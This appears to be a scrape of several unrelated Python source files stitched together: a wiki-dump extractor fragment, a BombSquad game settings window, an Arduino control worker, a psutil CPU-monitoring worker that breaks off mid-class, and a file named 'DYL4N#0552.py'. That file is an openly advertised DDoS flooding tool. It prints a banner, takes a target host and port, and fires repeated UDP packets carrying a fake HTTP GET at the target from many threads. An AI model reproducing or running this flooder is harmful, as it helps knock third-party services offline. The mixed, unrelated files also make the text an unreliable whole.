os.makedirs(output_path)
except:
logging.error('Could not create: %s', output_path)
return
process_dump(input_file, args.templates, output_path, file_size,
args.compress, args.processes, args.html_safe)
if __name__ == '__main__':
main()
|
advanced.py
|
# Released under the MIT License. See LICENSE for details.
#
"""UI functionality for advanced settings."""
from __future__ import annotations
from typing import TYPE_CHECKING
import _ba
import ba
from bastd.ui import popup as popup_ui
if TYPE_CHECKING:
from typing import Any, Optional
class AdvancedSettingsWindow(ba.Window):
"""Window for editing advanced game settings."""
def __init__(self,
transition: str = 'in_right',
origin_widget: ba.Widget = None):
# pylint: disable=too-many-statements
from ba.internal import master_server_get
import threading
# Preload some modules we use in a background thread so we won't
# have a visual hitch when the user taps them.
threading.Thread(target=self._preload_modules).start()
app = ba.app
# If they provided an origin-widget, scale up from that.
scale_origin: Optional[tuple[float, float]]
if origin_widget is not None:
self._transition_out = 'out_scale'
scale_origin = origin_widget.get_screen_space_center()
transition = 'in_scale'
else:
self._transition_out = 'out_right'
scale_origin = None
uiscale = ba.app.ui.uiscale
self._width = 870.0 if uiscale is ba.UIScale.SMALL else 670.0
x_inset = 100 if uiscale is ba.UIScale.SMALL else 0
self._height = (390.0 if uiscale is ba.UIScale.SMALL else
450.0 if uiscale is ba.UIScale.MEDIUM else 520.0)
self._spacing = 32
self._menu_open = False
top_extra = 10 if uiscale is ba.UIScale.SMALL else 0
super().__init__(root_widget=ba.containerwidget(
size=(self._width, self._height + top_extra),
transition=transition,
toolbar_visibility='menu_minimal',
scale_origin_stack_offset=scale_origin,
scale=(2.06 if uiscale is ba.UIScale.SMALL else
1.4 if uiscale is ba.UIScale.MEDIUM else 1.0),
stack_offset=(0, -25) if uiscale is ba.UIScale.SMALL else (0, 0)))
self._prev_lang = ''
self._prev_lang_list: list[str] = []
self._complete_langs_list: Optional[list] = None
self._complete_langs_error = False
self._language_popup: Optional[popup_ui.PopupMenu] = None
# In vr-mode, the internal keyboard is currently the *only* option,
# so no need to show this.
self._show_always_use_internal_keyboard = (not app.vr_mode
and not app.iircade_mode)
self._scroll_width = self._width - (100 + 2 * x_inset)
self._scroll_height = self._height - 115.0
self._sub_width = self._scroll_width * 0.95
self._sub_height = 724.0
if self._show_always_use_internal_keyboard:
self._sub_height += 62
self._show_disable_gyro = app.platform in {'ios', 'android'}
if self._show_disable_gyro:
self._sub_height += 42
self._do_vr_test_button = app.vr_mode
self._do_net_test_button = True
self._extra_button_spacing = self._spacing * 2.5
if self._do_vr_test_button:
self._sub_height += self._extra_button_spacing
if self._do_net_test_button:
self._sub_height += self._extra_button_spacing
self._sub_height += self._spacing * 2.0 # plugins
self._r = 'settingsWindowAdvanced'
if app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
ba.containerwidget(edit=self._root_widget,
on_cancel_call=self._do_back)
self._back_button = None
else:
self._back_button = ba.buttonwidget(
parent=self._root_widget,
position=(53 + x_inset, self._height - 60),
size=(140, 60),
scale=0.8,
autoselect=True,
label=ba.Lstr(resource='backText'),
button_type='back',
on_activate_call=self._do_back)
ba.containerwidget(edit=self._root_widget,
cancel_button=self._back_button)
self._title_text = ba.textwidget(parent=self._root_widget,
position=(0, self._height - 52),
size=(self._width, 25),
text=ba.Lstr(resource=self._r +
'.titleText'),
color=app.ui.title_color,
h_align='center',
v_align='top')
if self._back_button is not None:
ba.buttonwidget(edit=self._back_button,
button_type='backSmall',
size=(60, 60),
label=ba.charstr(ba.SpecialChar.BACK))
self._scrollwidget = ba.scrollwidget(parent=self._root_widget,
position=(50 + x_inset, 50),
simple_culling_v=20.0,
highlight=False,
size=(self._scroll_width,
self._scroll_height),
selection_loops_to_parent=True)
ba.widget(edit=self._scrollwidget, right_widget=self._scrollwidget)
self._subcontainer = ba.containerwidget(parent=self._scrollwidget,
size=(self._sub_width,
self._sub_height),
background=False,
selection_loops_to_parent=True)
self._rebuild()
# Rebuild periodically to pick up language changes/additions/etc.
self._rebuild_timer = ba.Timer(1.0,
ba.WeakCall(self._rebuild),
repeat=True,
timetype=ba.TimeType.REAL)
# Fetch the list of completed languages.
master_server_get('bsLangGetCompleted', {'b': app.build_number},
callback=ba.WeakCall(self._completed_langs_cb))
@staticmethod
def _preload_modules() -> None:
"""Preload modules we use (called in bg thread)."""
from bastd.ui import config as _unused1
from ba import modutils as _unused2
from bastd.ui.settings import vrtesting as _unused3
from bastd.ui.settings import nettesting as _unused4
from bastd.ui import appinvite as _unused5
from bastd.ui import account as _unused6
from bastd.ui import promocode as _unused7
from bastd.ui import debug as _unused8
from bastd.ui.settings import plugins as _unused9
def _update_lang_status(self) -> None:
if self._complete_langs_list is not None:
up_to_date = (ba.app.lang.language in self._complete_langs_list)
ba.textwidget(
edit=self._lang_status_text,
text='' if ba.app.lang.language == 'Test' else ba.Lstr(
resource=self._r + '.translationNoUpdateNeededText')
if up_to_date else ba.Lstr(resource=self._r +
'.translationUpdateNeededText'),
color=(0.2, 1.0, 0.2, 0.8) if up_to_date else
(1.0, 0.2, 0.2, 0.8))
else:
ba.textwidget(
edit=self._lang_status_text,
text=ba.Lstr(resource=self._r + '.translationFetchErrorText')
if self._complete_langs_error else ba.Lstr(
resource=self._r + '.translationFetchingStatusText'),
color=(1.0, 0.5, 0.2) if self._complete_langs_error else
(0.7, 0.7, 0.7))
def _rebuild(self) -> None:
# pylint: disable=too-many-statements
# pylint: disable=too-many-branches
# pylint: disable=too-many-locals
from bastd.ui.config import ConfigCheckBox
from ba.modutils import show_user_scripts
available_languages = ba.app.lang.available_languages
# Don't rebuild if the menu is open or if our language and
# language-list hasn't changed.
# NOTE - although we now support widgets updating their own
# translations, we still change the label formatting on the language
# menu based on the language so still need this. ...however we could
# make this more limited to it only rebuilds that one menu instead
# of everything.
if self._menu_open or (self._prev_lang == _ba.app.config.get(
'Lang', None) and self._prev_lang_list == available_languages):
return
self._prev_lang = _ba.app.config.get('Lang', None)
self._prev_lang_list = available_languages
# Clear out our sub-container.
children = self._subcontainer.get_children()
for child in children:
child.delete()
v = self._sub_height - 35
v -= self._spacing * 1.2
# Update our existing back button and title.
if self._back_button is not None:
ba.buttonwidget(edit=self._back_button,
label=ba.Lstr(resource='backText'))
ba.buttonwidget(edit=self._back_button,
label=ba.charstr(ba.SpecialChar.BACK))
ba.textwidget(edit=self._title_text,
text=ba.Lstr(resource=self._r + '.titleText'))
this_button_width = 410
self._promo_code_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 14),
size=(this_button_width, 60),
autoselect=True,
label=ba.Lstr(resource=self._r + '.enterPromoCodeText'),
text_scale=1.0,
on_activate_call=self._on_promo_code_press)
if self._back_button is not None:
ba.widget(edit=self._promo_code_button,
up_widget=self._back_button,
left_widget=self._back_button)
v -= self._extra_button_spacing * 0.8
ba.textwidget(parent=self._subcontainer,
position=(200, v + 10),
size=(0, 0),
text=ba.Lstr(resource=self._r + '.languageText'),
maxwidth=150,
scale=0.95,
color=ba.app.ui.title_color,
h_align='right',
v_align='center')
languages = _ba.app.lang.available_languages
cur_lang = _ba.app.config.get('Lang', None)
if cur_lang is None:
cur_lang = 'Auto'
# We have a special dict of language names in that language
# so we don't have to go digging through each full language.
try:
import json
with open('ba_data/data/langdata.json',
encoding='utf-8') as infile:
lang_names_translated = (json.loads(
infile.read())['lang_names_translated'])
except Exception:
ba.print_exception('Error reading lang data.')
lang_names_translated = {}
langs_translated = {}
for lang in languages:
langs_translated[lang] = lang_names_translated.get(lang, lang)
langs_full = {}
for lang in languages:
lang_translated = ba.Lstr(translate=('languages', lang)).evaluate()
if langs_translated[lang] == lang_translated:
langs_full[lang] = lang_translated
else:
langs_full[lang] = (langs_translated[lang] + ' (' +
lang_translated + ')')
self._language_popup = popup_ui.PopupMenu(
parent=self._subcontainer,
position=(210, v - 19),
width=150,
opening_call=ba.WeakCall(self._on_menu_open),
closing_call=ba.WeakCall(self._on_menu_close),
autoselect=False,
on_value_change_call=ba.WeakCall(self._on_menu_choice),
choices=['Auto'] + languages,
button_size=(250, 60),
choices_display=([
ba.Lstr(value=(ba.Lstr(resource='autoText').evaluate() + ' (' +
ba.Lstr(translate=('languages',
ba.app.lang.default_language
)).evaluate() + ')'))
] + [ba.Lstr(value=langs_full[l]) for l in languages]),
current_choice=cur_lang)
v -= self._spacing * 1.8
ba.textwidget(parent=self._subcontainer,
position=(self._sub_width * 0.5, v + 10),
size=(0, 0),
text=ba.Lstr(resource=self._r + '.helpTranslateText',
subs=[('${APP_NAME}',
ba.Lstr(resource='titleText'))]),
maxwidth=self._sub_width * 0.9,
max_height=55,
flatness=1.0,
scale=0.65,
color=(0.4, 0.9, 0.4, 0.8),
h_align='center',
v_align='center')
v -= self._spacing * 1.9
this_button_width = 410
self._translation_editor_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 24),
size=(this_button_width, 60),
label=ba.Lstr(resource=self._r + '.translationEditorButtonText',
subs=[('${APP_NAME}', ba.Lstr(resource='titleText'))
]),
autoselect=True,
on_activate_call=ba.Call(
ba.open_url, 'https://legacy.ballistica.net/translate'))
self._lang_status_text = ba.textwidget(parent=self._subcontainer,
position=(self._sub_width * 0.5,
v - 40),
size=(0, 0),
text='',
flatness=1.0,
scale=0.63,
h_align='center',
v_align='center',
maxwidth=400.0)
self._update_lang_status()
v -= 40
lang_inform = _ba.get_account_misc_val('langInform', False)
self._language_inform_checkbox = cbw = ba.checkboxwidget(
parent=self._subcontainer,
position=(50, v - 50),
size=(self._sub_width - 100, 30),
autoselect=True,
maxwidth=430,
textcolor=(0.8, 0.8, 0.8),
value=lang_inform,
text=ba.Lstr(resource=self._r + '.translationInformMe'),
on_value_change_call=ba.WeakCall(
self._on_lang_inform_value_change))
ba.widget(edit=self._translation_editor_button,
down_widget=cbw,
up_widget=self._language_popup.get_button())
v -= self._spacing * 3.0
self._kick_idle_players_check_box = ConfigCheckBox(
parent=self._subcontainer,
position=(50, v),
size=(self._sub_width - 100, 30),
configkey='Kick Idle Players',
displayname=ba.Lstr(resource=self._r + '.kickIdlePlayersText'),
scale=1.0,
maxwidth=430)
v -= 42
self._disable_camera_shake_check_box = ConfigCheckBox(
parent=self._subcontainer,
position=(50, v),
size=(self._sub_width - 100, 30),
configkey='Disable Camera Shake',
displayname=ba.Lstr(resource=self._r + '.disableCameraShakeText'),
scale=1.0,
maxwidth=430)
self._disable_gyro_check_box: Optional[ConfigCheckBox] = None
if self._show_disable_gyro:
v -= 42
self._disable_gyro_check_box = ConfigCheckBox(
parent=self._subcontainer,
position=(50, v),
size=(self._sub_width - 100, 30),
configkey='Disable Camera Gyro',
displayname=ba.Lstr(resource=self._r +
'.disableCameraGyroscopeMotionText'),
scale=1.0,
maxwidth=430)
self._always_use_internal_keyboard_check_box: Optional[ConfigCheckBox]
if self._show_always_use_internal_keyboard:
v -= 42
self._always_use_internal_keyboard_check_box = ConfigCheckBox(
parent=self._subcontainer,
position=(50, v),
size=(self._sub_width - 100, 30),
configkey='Always Use Internal Keyboard',
autoselect=True,
displayname=ba.Lstr(resource=self._r +
'.alwaysUseInternalKeyboardText'),
scale=1.0,
maxwidth=430)
ba.textwidget(
parent=self._subcontainer,
position=(90, v - 10),
size=(0, 0),
text=ba.Lstr(resource=self._r +
'.alwaysUseInternalKeyboardDescriptionText'),
maxwidth=400,
flatness=1.0,
scale=0.65,
color=(0.4, 0.9, 0.4, 0.8),
h_align='left',
v_align='center')
v -= 20
else:
self._always_use_internal_keyboard_check_box = None
v -= self._spacing * 2.1
this_button_width = 410
self._show_user_mods_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 10),
size=(this_button_width, 60),
autoselect=True,
label=ba.Lstr(resource=self._r + '.showUserModsText'),
text_scale=1.0,
on_activate_call=show_user_scripts)
if self._show_always_use_internal_keyboard:
assert self._always_use_internal_keyboard_check_box is not None
ba.widget(edit=self._always_use_internal_keyboard_check_box.widget,
down_widget=self._show_user_mods_button)
ba.widget(
edit=self._show_user_mods_button,
up_widget=self._always_use_internal_keyboard_check_box.widget)
else:
ba.widget(edit=self._show_user_mods_button,
up_widget=self._kick_idle_players_check_box.widget)
ba.widget(edit=self._kick_idle_players_check_box.widget,
down_widget=self._show_user_mods_button)
v -= self._spacing * 2.0
self._modding_guide_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 10),
size=(this_button_width, 60),
autoselect=True,
label=ba.Lstr(resource=self._r + '.moddingGuideText'),
text_scale=1.0,
on_activate_call=ba.Call(
ba.open_url,
'http://www.froemling.net/docs/bombsquad-modding-guide'))
v -= self._spacing * 2.0
self._plugins_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 10),
size=(this_button_width, 60),
autoselect=True,
label=ba.Lstr(resource='pluginsText'),
text_scale=1.0,
on_activate_call=self._on_plugins_button_press)
v -= self._spacing * 0.6
self._vr_test_button: Optional[ba.Widget]
if self._do_vr_test_button:
v -= self._extra_button_spacing
self._vr_test_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 14),
size=(this_button_width, 60),
autoselect=True,
label=ba.Lstr(resource=self._r + '.vrTestingText'),
text_scale=1.0,
on_activate_call=self._on_vr_test_press)
else:
self._vr_test_button = None
self._net_test_button: Optional[ba.Widget]
if self._do_net_test_button:
v -= self._extra_button_spacing
self._net_test_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 14),
size=(this_button_width, 60),
autoselect=True,
label=ba.Lstr(resource=self._r + '.netTestingText'),
text_scale=1.0,
on_activate_call=self._on_net_test_press)
else:
self._net_test_button = None
v -= 70
self._benchmarks_button = ba.buttonwidget(
parent=self._subcontainer,
position=(self._sub_width / 2 - this_button_width / 2, v - 14),
size=(this_button_width, 60),
autoselect=True,
label=ba.Lstr(resource=self._r + '.benchmarksText'),
text_scale=1.0,
on_activate_call=self._on_benchmark_press)
for child in self._subcontainer.get_children():
ba.widget(edit=child, show_buffer_bottom=30, show_buffer_top=20)
if ba.app.ui.use_toolbars:
pbtn = _ba.get_special_widget('party_button')
ba.widget(edit=self._scrollwidget, right_widget=pbtn)
if self._back_button is None:
ba.widget(edit=self._scrollwidget,
left_widget=_ba.get_special_widget('back_button'))
self._restore_state()
def _show_restart_needed(self, value: Any) -> None:
del value # Unused.
ba.screenmessage(ba.Lstr(resource=self._r + '.mustRestartText'),
color=(1, 1, 0))
def _on_lang_inform_value_change(self, val: bool) -> None:
_ba.add_transaction({
'type': 'SET_MISC_VAL',
'name': 'langInform',
'value': val
})
_ba.run_transactions()
def _on_vr_test_press(self) -> None:
from bastd.ui.settings.vrtesting import VRTestingWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
VRTestingWindow(transition='in_right').get_root_widget())
def _on_net_test_press(self) -> None:
from bastd.ui.settings.nettesting import NetTestingWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
NetTestingWindow(transition='in_right').get_root_widget())
def _on_friend_promo_code_press(self) -> None:
from bastd.ui import appinvite
from bastd.ui import account
if _ba.get_account_state() != 'signed_in':
account.show_sign_in_prompt()
return
appinvite.handle_app_invites_press()
def _on_plugins_button_press(self) -> None:
from bastd.ui.settings.plugins import PluginSettingsWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
PluginSettingsWindow(
origin_widget=self._plugins_button).get_root_widget())
def _on_promo_code_press(self) -> None:
from bastd.ui.promocode import PromoCodeWindow
from bastd.ui.account import show_sign_in_prompt
# We have to be logged in for promo-codes to work.
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
return
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
PromoCodeWindow(
origin_widget=self._promo_code_button).get_root_widget())
def _on_benchmark_press(self) -> None:
from bastd.ui.debug import DebugWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
DebugWindow(transition='in_right').get_root_widget())
def _save_state(self) -> None:
# pylint: disable=too-many-branches
try:
sel = self._root_widget.get_selected_child()
if sel == self._scrollwidget:
sel = self._subcontainer.get_selected_child()
if sel == self._vr_test_button:
sel_name = 'VRTest'
elif sel == self._net_test_button:
sel_name = 'NetTest'
elif sel == self._promo_code_button:
sel_name = 'PromoCode'
elif sel == self._benchmarks_button:
sel_name = 'Benchmarks'
elif sel == self._kick_idle_players_check_box.widget:
sel_name = 'KickIdlePlayers'
elif sel == self._disable_camera_shake_check_box.widget:
sel_name = 'DisableCameraShake'
elif (self._always_use_internal_keyboard_check_box is not None
and sel
== self._always_use_internal_keyboard_check_box.widget):
sel_name = 'AlwaysUseInternalKeyboard'
elif (self._disable_gyro_check_box is not None
and sel == self._disable_gyro_check_box.widget):
sel_name = 'DisableGyro'
elif (self._language_popup is not None
and sel == self._language_popup.get_button()):
sel_name = 'Languages'
elif sel == self._translation_editor_button:
sel_name = 'TranslationEditor'
elif sel == self._show_user_mods_button:
sel_name = 'ShowUserMods'
elif sel == self._plugins_button:
sel_name = 'Plugins'
elif sel == self._modding_guide_button:
sel_name = 'ModdingGuide'
elif sel == self._language_inform_checkbox:
sel_name = 'LangInform'
else:
raise ValueError(f'unrecognized selection \'{sel}\'')
elif sel == self._back_button:
sel_name = 'Back'
else:
raise ValueError(f'unrecognized selection \'{sel}\'')
ba.app.ui.window_states[type(self)] = {'sel_name': sel_name}
except Exception:
ba.print_exception(f'Error saving state for {self.__class__}')
def _restore_state(self) -> None:
# pylint: disable=too-many-branches
try:
sel_name = ba.app.ui.window_states.get(type(self),
{}).get('sel_name')
if sel_name == 'Back':
sel = self._back_button
else:
ba.containerwidget(edit=self._root_widget,
selected_child=self._scrollwidget)
if sel_name == 'VRTest':
sel = self._vr_test_button
elif sel_name == 'NetTest':
sel = self._net_test_button
elif sel_name == 'PromoCode':
sel = self._promo_code_button
elif sel_name == 'Benchmarks':
sel = self._benchmarks_button
elif sel_name == 'KickIdlePlayers':
sel = self._kick_idle_players_check_box.widget
elif sel_name == 'DisableCameraShake':
sel = self._disable_camera_shake_check_box.widget
elif (sel_name == 'AlwaysUseInternalKeyboard'
and self._always_use_internal_keyboard_check_box
is not None):
sel = self._always_use_internal_keyboard_check_box.widget
elif (sel_name == 'DisableGyro'
and self._disable_gyro_check_box is not None):
sel = self._disable_gyro_check_box.widget
elif (sel_name == 'Languages'
and self._language_popup is not None):
sel = self._language_popup.get_button()
elif sel_name == 'TranslationEditor':
sel = self._translation_editor_button
elif sel_name == 'ShowUserMods':
sel = self._show_user_mods_button
elif sel_name == 'Plugins':
sel = self._plugins_button
elif sel_name == 'ModdingGuide':
sel = self._modding_guide_button
elif sel_name == 'LangInform':
sel = self._language_inform_checkbox
else:
sel = None
if sel is not None:
ba.containerwidget(edit=self._subcontainer,
selected_child=sel,
visible_child=sel)
except Exception:
ba.print_exception(f'Error restoring state for {self.__class__}')
def _on_menu_open(self) -> None:
self._menu_open = True
def _on_menu_close(self) -> None:
self._menu_open = False
def _on_menu_choice(self, choice: str) -> None:
ba.app.lang.setlanguage(None if choice == 'Auto' else choice)
self._save_state()
ba.timer(0.1, ba.WeakCall(self._rebuild), timetype=ba.TimeType.REAL)
def _completed_langs_cb(self, results: Optional[dict[str, Any]]) -> None:
if results is not None and results['langs'] is not None:
self._complete_langs_list = results['langs']
self._complete_langs_error = False
else:
self._complete_langs_list = None
self._complete_langs_error = True
ba.timer(0.001,
ba.WeakCall(self._update_lang_status),
timetype=ba.TimeType.REAL)
def _do_back(self) -> None:
from bastd.ui.settings.allsettings import AllSettingsWindow
self._save_state()
ba.containerwidget(edit=self._root_widget,
transition=self._transition_out)
ba.app.ui.set_main_menu_window(
AllSettingsWindow(transition='in_left').get_root_widget())
|
DYL4N#0552.py
|
import os
import socket
import string
import random
import threading
from colorama import Fore, Back, Style
class SockFlood:
def __init__(self):
os.system("cls")
os.system("title D.DDOS - An Advance DDOS Tool ")
self.host=None
self.portnum=None
self.threads=None
def graphics(self):
banner="""
DDDDDDDDDDDDD YYYYYYY YYYYYYYLLLLLLLLLLL 444444444 NNNNNNNN NNNNNNNN
D::::::::::::DDD Y:::::Y Y:::::YL:::::::::L 4::::::::4 N:::::::N N::::::N
D:::::::::::::::DD Y:::::Y Y:::::YL:::::::::L 4:::::::::4 N::::::::N N::::::N
DDD:::::DDDDD:::::D Y::::::Y Y::::::YLL:::::::LL 4::::44::::4 N:::::::::N N::::::N
D:::::D D:::::D YYY:::::Y Y:::::YYY L:::::L 4::::4 4::::4 N::::::::::N N::::::N
D:::::D D:::::D Y:::::Y Y:::::Y L:::::L 4::::4 4::::4 N:::::::::::N N::::::N
D:::::D D:::::D Y:::::Y:::::Y L:::::L 4::::4 4::::4 N:::::::N::::N N::::::N
D:::::D D:::::D Y:::::::::Y L:::::L 4::::444444::::444N::::::N N::::N N::::::N
D:::::D D:::::D Y:::::::Y L:::::L 4::::::::::::::::4N::::::N N::::N:::::::N
D:::::D D:::::D Y:::::Y L:::::L 4444444444:::::444N::::::N N:::::::::::N
D:::::D D:::::D Y:::::Y L:::::L 4::::4 N::::::N N::::::::::N
D:::::D D:::::D Y:::::Y L:::::L LLLLLL 4::::4 N::::::N N:::::::::N
DDD:::::DDDDD:::::D Y:::::Y LL:::::::LLLLLLLLL:::::L 4::::4 N::::::N N::::::::N
D:::::::::::::::DD YYYY:::::YYYY L::::::::::::::::::::::L 44::::::44N::::::N N:::::::N
D::::::::::::DDD Y:::::::::::Y L::::::::::::::::::::::L 4::::::::4N::::::N N::::::N
DDDDDDDDDDDDD YYYYYYYYYYYYY LLLLLLLLLLLLLLLLLLLLLLLL 4444444444NNNNNNNN NNNNNNN
"""
print(Fore.RED+banner)
print(Fore.YELLOW+"""
[+] An Advance DDOS Tool Using Sockets Written in Python [+]"""+Fore.GREEN+"""
[+] Developer : DYL4N#0552 [ """+Fore.WHITE+"""s1ralt ]""")
print(Fore.WHITE+"""
[+] Type `help` If You Are A Beginner [+]
""")
def start_attack(self,host,port=None):
self.sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
try:
url_path=str(string.ascii_letters + string.digits + string.punctuation)
byt = (f"GET /{url_path} HTTP/1.1\nHost: {host}\n\n").encode()
if not port:
self.sock.sendto(byt,(host,80))
elif port:
self.sock.sendto(byt,(host,int(port)))
print(Fore.WHITE+"""[+] Sent Byte Successfully""")
except Exception as e:
print(Fore.RED+f"""
[-] Socket ERROR! Fatal X_X
[-] EXCEPTION : {e}
""")
def command_parser(self,command):
if command=="help":
print(Fore.WHITE+"""
Welcome To D.DDOS Help Menu -
(+) host %HOST% - Enter the Host Domain or Ip Address [!Required]
(+) port %PORT% - Enter a custom port if you have, or just don't use it will use port 80
(+) attacks %AMOUNT% - Enter a custom amount of attack, Default 1000
(+) start - Will start attacking and display outputs on console
""")
if "host " in command:
self.host=command.replace("host ","").replace("https://", "").replace("http://", "").replace("www.", "")
print(Fore.WHITE+f"""
[+] Successfully Set Host as {self.host}
""")
elif "port " in command:
self.portnum=command.replace("port ","")
print(Fore.WHITE+f"""
[+] Successfully Set Port to {self.portnum}
""")
elif command=="start":
print(self.portnum)
if self.host and self.portnum:
if int(self.threads):
for i in range(1,int(self.threads)):
threading.Thread(target=self.start_attack(self.host,self.portnum)).start()
else:
for i in range(1,1000):
threading.Thread(target=self.start_attack(self.host,self.portnum)).start()
elif self.host and not self.portnum:
if int(self.threads):
for i in range(1,int(self.threads)):
threading.Thread(target=self.start_attack(self.host)).start()
else:
for i in range(1,1000):
threading.Thread(target=self.start_attack(self.host)).start()
elif "attacks " in command:
self.threads=command.replace("attacks ","")
print(Fore.WHITE+f"""
[+] Successfully Set Threads to {self.threads}
""")
def run(self):
self.graphics()
while True:
self.command_parser(input(Fore.CYAN+f"${os.environ.get('USERNAME')}$>> "))
if __name__=="__main__":
app=SockFlood()
app.run()
|
arduino_control_worker.py
|
import time
import json
import threading
import random
import socket
from nanpy import (SerialManager)
from nanpy.serialmanager import SerialManagerError
from nanpy.sockconnection import (SocketManager, SocketManagerError)
import sys
sys.path.append('..')
import variables
import importlib
#r = redis.Redis(host='127.0.0.1', port=6379)
class ArduinoControlWorker():
def __init__(self, config, main_thread_running, system_ready, node_connected, connection=None):
#self.config = {**config, **self.config}
self.config = config
self.main_thread_running = main_thread_running
self.system_ready = system_ready
self.controls_ready = False
self.node_connected = node_connected
self.connection = connection
self.controls = []
if node_connected.is_set():
self.init_controls()
self.controls_ready = True
return
def dynamic_import(self, path):
components = path.split('.')
s = ''
for component in components[:-1]:
s += component + '.'
parent = importlib.import_module(s[:-1])
sensor = getattr(parent, components[-1])
return sensor
def init_controls(self):
try:
for control in self.config['controls']:
if control.get('type', None) is not None:
#Get the control from the controls folder {control name}_control.{ControlName}Control
control_type = 'controls.arduino.' + control.get('type').lower() + '_control.' + control.get('type').capitalize() + 'Control'
analog_pin_mode = False if control.get('is_digital', False) else True
imported_control = self.dynamic_import(control_type)
#new_control = imported_control(control.get('pin'), name=control.get('name', control.get('type')), connection=self.connection, key=control.get('key', None))
# Define default kwargs for all control types, conditionally include optional variables below if they exist
control_kwargs = {
'name' : control.get('name', control.get('type')),
'pin' : int(control.get('pin')),
'connection': self.connection,
'key' : control.get('key', None),
'analog_pin_mode': analog_pin_mode,
'topic': control.get('topic', None)
}
# optional control variables
# add conditional control vars here...
new_control = imported_control(**control_kwargs)
new_control.init_control()
self.controls.append(new_control)
print('{type} Control {pin}...\t\t\t\033[1;32m Ready\033[0;0m'.format(**control))
except (SerialManagerError, SocketManagerError, BrokenPipeError, ConnectionResetError, OSError, socket.timeout) as e:
# Connection error. Reset everything for reconnect
self.controls_ready = False
self.node_connected.clear()
self.controls = []
return
def run(self):
t = threading.Thread(target=self.work, args=())
t.start()
return t
def work(self):
while self.main_thread_running.is_set():
if self.system_ready.is_set():
if self.node_connected.is_set():
if self.controls_ready:
try:
readings = {}
for control in self.controls:
result = control.read()
readings[control.key] = result
except (SerialManagerError, SocketManagerError, BrokenPipeError, ConnectionResetError, OSError, socket.timeout) as e:
print('\033[1;36m{name}\033[0;0m -> \033[1;33mControls Timeout!\033[0;0m'.format(**self.config))
self.controls_ready = False
self.controls = []
self.node_connected.clear()
time.sleep(15)
else:
# Worker connected but controls not initialized
self.init_controls()
self.controls_ready = True
else:
# Node not connected. Wait for reconnect
self.controls_ready = False
self.controls = []
time.sleep(10)
#Will this nuke the connection?
time.sleep(0.05)
#This is only ran after the main thread is shut down
print("{name} Controls Shutting Down...\t\033[1;32m Complete\033[0;0m".format(**self.config))
|
worker.py
|
# -*- coding: utf-8 -*-
import threading
from multiprocessing import Process, Event
import time
import psutil
class WorkerBase(object):
def __init__(self, mode="threading"):
if mode not in ['threading', 'proccessing']:
raise ValueError("Bad mode.")
self._work_mode = mode
def work(self):
if self._work_mode == "threading":
self._running = True
self._worker = threading.Thread(target=self.run, args=(self._work_mode, self._running,))
self._worker.setDaemon(True)
else:
self._running = Event()
self._worker = Process(target=self.run, args=(self._work_mode, self._running,))
self._worker.daemon = True
self._running.set()
self._worker.start()
def exit(self, force=False):
if self._work_mode == "threading":
self._running = False
else:
self._running.clear()
if self.isOK():
self._worker.join()
return True
def beforeWork(self):
pass
def afterWork(self):
pass
def run(self, mode, status):
self.beforeWork()
if mode == "threading":
while self._running:
self.main()
else:
while status.is_set():
self.main()
self.afterWork()
def main(self):
print time.strftime("%H:%M:%S", time.localtime(int(time.time()))), "I'm working..."
time.sleep(1)
def isOK(self):
if self._work_mode == "threading":
return self._worker.isAlive()
else:
return self._worker.is_alive()
class CPUWorker(WorkerBase):
"""采集cpu数据"""
def __init__(self, dashboard, mode="threading"):
super(CPUWorker, self).__init__(mode)
self._name = 'cpuWorker'
self._dashboard = dashboard
logger = dashboard.getLogger(self._name)
logger.info("cpuWorker is created.")
config = dashboard.getConfig(self._name)
self._collector_time_interval = config['time_interval']
def beforeWork(self):
"""
在进行统计之前先采集一下数据,否则由于psutil基准时为0会导致第一次采集数据为0
"""
psutil.cpu_count(logical=True)
psutil.cpu_count(logical=False)
psutil.cpu_percent()
psutil.cpu_times_percent()
psutil.cpu_freq().current
logger = self._dashboard.getLogger(self._name)
logger.info("{} is working now.".format(self._name))
def afterWork(self):
logger = self._dashboard.getLogger(self._name)
logger.info("{} is stop working.".format(self._name))
def main(self):
# 逻辑核
logical_cnt = psutil.cpu_count(logical=True)
# 物理核
physics_cnt = psutil.cpu_count(logical=False)
# CPU实时使用率
cpu_current_use_rate = psutil.cpu_percent()
# CPU类型时百分比统计
typeT = psutil.cpu_times_percent()
cpu_user_time = typeT.user # 用户时
cpu_system_time = typeT.system # 系统时
cpu_idle_time = typeT.idle # 空闲时
# CPU频率统计
cpu_current_freq = psutil.cpu_freq().current
# 写入数据
database = self._dashboard.getDatabase(self._name)
config = self._dashboard.getConfig(self._name)
logger = self._dashboard.getLogger(self._name)
record = {
'TIMESTAMP': int(time.time()),
'LOGICALCNT': logical_cnt,
'PHYSICSCNT': physics_cnt,
'USERATE': cpu_current_use_rate,
'USERTIME': cpu_user_time,
'SYSTEMTIME': cpu_system_time,
'IDLETIME': cpu_idle_time,
'FREQUENCY': cpu_current_freq
}
if database.insert(config.get('table_name'), record):
logger.debug('insert success.')
else:
logger.warn('insert fail.')
time.sleep(self._collector_time_interval)
class MemoryWorker(WorkerBase):
def __init__(self, dashboard, mode='threading'):
super(MemoryWorker, self).__init__(mode=mode)
self._name = 'memoryWorker'
self._dashboard = dashboard
